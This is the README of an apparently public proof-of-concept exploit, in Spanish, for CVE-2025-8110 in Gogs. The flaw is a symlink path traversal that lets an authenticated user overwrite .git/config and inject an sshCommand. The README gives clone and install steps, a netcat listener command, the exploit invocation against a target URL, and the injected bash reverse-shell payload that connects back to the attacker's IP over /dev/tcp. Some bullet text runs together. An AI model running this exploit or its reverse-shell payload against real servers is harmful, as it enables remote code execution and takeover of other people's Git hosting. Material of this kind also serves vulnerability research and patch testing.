
Exploit de prueba de concepto para CVE-2025-8110, una vulnerabilidad RCE en Gogs que explota el path traversal mediante enlaces simbólicos e inyección de sshCommand para entregar una reverse shell.
Una prueba de concepto (PoC) para CVE-2025-8110, una vulnerabilidad crítica en Gogs que permite ejecución remota de código (RCE) mediante la manipulación de .git/config usando bypass de enlaces simbólicos e inyección de sshCommand.
Esta explotación apunta a una falla de Path Traversal en la gestión de contenido de la API de Gogs. Un usuario autenticado puede:
.git/config interno.sshCommand malicioso para ejecutar una Reverse Shell cuando el servidor realice operaciones Git.!, @).Rich.git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
Instala las dependencias:
pip3 install -r requirements.txt
💻 Uso
Inicia tu listener:
nc -lvnp 6666
Ejecuta el exploit:
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'
Argumentos:
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
Cuando Gogs ejecuta un comando Git que requiere transporte de red (como una sincronización de espejo o una comprobación interna de referencias), invoca el sshCommand, activando la reverse shell.
| Argumento | Descripción |
|---|
-u, --url | URL base de la instancia de Gogs objetivo (p. ej., http://target.htb:3000). |
-lh, --host | IP del atacante (LHOST) a la que se conectará la reverse shell. |
-lp, --port | Puerto del listener (LPORT) configurado en tu máquina. |
-p, --password | Contraseña de la cuenta pwnuser para realizar la autenticación. |
-x, --proxy | (Opcional) Enruta el tráfico a través de un proxy local (por defecto: http://localhost:8080). |